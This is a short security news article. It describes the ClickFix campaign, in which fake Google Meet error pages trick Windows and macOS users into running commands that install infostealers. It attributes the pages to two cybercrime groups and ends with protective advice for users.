Victims are often misled into copying malicious PowerShell code under the guise of fixing these supposed errors, which ultimately infects their systems.

To mitigate the risks associated with ClickFix, cybersecurity experts recommend that users remain vigilant, verify scripts before execution, and employ strong security measures.

Meanwhile, macOS users are tricked into downloading the AMOS Stealer malware through similar deceptive alerts.

This social engineering tactic is particularly effective because it requires users to manually execute commands, making it harder for standard security tools to detect the threat.

Experts warn that similar social engineering techniques may be employed in future malware distribution campaigns, highlighting the evolving nature of these threats.

The ClickFix campaign, which has been active since September 2024, is targeting users of Google Workspace by luring them to fraudulent Google Meet conference pages.

This campaign delivers info-stealing malware for both Windows and macOS, utilizing deceptive tactics that bypass traditional security measures.

Windows users are particularly at risk, as they may encounter fake error messages about microphone issues that lead to the download of Stealc and Rhadamanthys infostealers.

The impersonation of Google Meet in these campaigns has been attributed to two cybercrime groups, Slavic Nation Empire and Scamquerteo, which are believed to share resources.

Both groups utilize a shared ClickFix template that mimics Google Meet, indicating a coordinated effort in their cybercrime activities.

Users should be cautious of unexpected error messages, avoid clicking on dubious links, and utilize two-factor authentication to enhance their security.

Malware associated with ClickFix includes a variety of threats such as DarkGate, Lumma Stealer, and others, showcasing the breadth of this cyber threat.